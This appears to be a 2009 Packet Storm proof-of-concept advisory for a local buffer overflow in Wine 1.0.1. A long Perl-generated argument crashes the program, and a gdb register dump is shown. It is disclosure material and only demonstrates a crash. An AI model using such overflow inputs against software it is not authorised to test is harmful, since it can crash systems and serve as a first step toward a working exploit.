Wine 1.0.1 Buffer Overflow

2009-03-30T00:00:00
ID PACKETSTORM:76170
Type packetstorm
Reporter Jonathan Salwan
Modified 2009-03-30T00:00:00

Description

                                        
                                            `Linux Wine v1.0.1 Local Buffer Overflow (PoC)   
  
Author : Jonathan Salwan  
Mail : submit [AT] shell-storm.org  
Web : http://www.shell-storm.org  
  
  
Wine installed/tested with : -ubuntu 8.10 (kernel 2.6.27)   
-gcc version 4.3.2 (Ubuntu 4.3.2-1ubuntu12)  
  
  
Proof of Concept:  
--------------------------------------------------------------------------------------  
  
submit@submit-laptop:~$ wine --version  
wine-1.0.1  
submit@submit-laptop:~$ wine `perl -e "print('AAAA'x10000)"`  
Erreur de segmentation  
submit@submit-laptop:~$  
  
--------------------------------------------------------------------------------------  
  
submit@submit-laptop:~$ gdb /usr/bin/wine  
GNU gdb 6.8-debian  
Copyright (C) 2008 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show copying"  
and "show warranty" for details.  
This GDB was configured as "i486-linux-gnu"...  
(no debugging symbols found)  
(gdb) run `perl -e "print('AAAA'x10000)"`  
Starting program: /usr/bin/wine `perl -e "print('AAAA'x10000)"`  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
[Thread debugging using libthread_db enabled]  
(no debugging symbols found)  
(no debugging symbols found)  
[New Thread 0xb7c346b0 (LWP 11082)]  
[New Thread 0xb7c33b90 (LWP 11087)]  
[Thread 0xb7c33b90 (LWP 11087) exited]  
[New process 11082]  
Executing new program: /usr/bin/wine-preloader  
(no debugging symbols found)  
warning: Cannot initialize thread debugging library: generic error  
warning: Cannot initialize thread debugging library: generic error  
[New process 11082]  
  
Program received signal SIGSEGV, Segmentation fault.  
0x7bc42e9e in ?? ()  
(gdb) i r  
eax 0x110108 1114376  
ecx 0x17170 94576  
edx 0x410041 4259905  
ebx 0x7bc8aff4 2076749812  
esp 0xbfded9c0 0xbfded9c0  
ebp 0xbfded9e8 0xbfded9e8  
esi 0x1411d0 1315280  
edi 0x158340 1409856  
eip 0x7bc42e9e 0x7bc42e9e  
eflags 0x10202 [ IF RF ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x33 51  
gs 0x3b 59  
(gdb)  
--------------------------------------------------------------------------------------  
`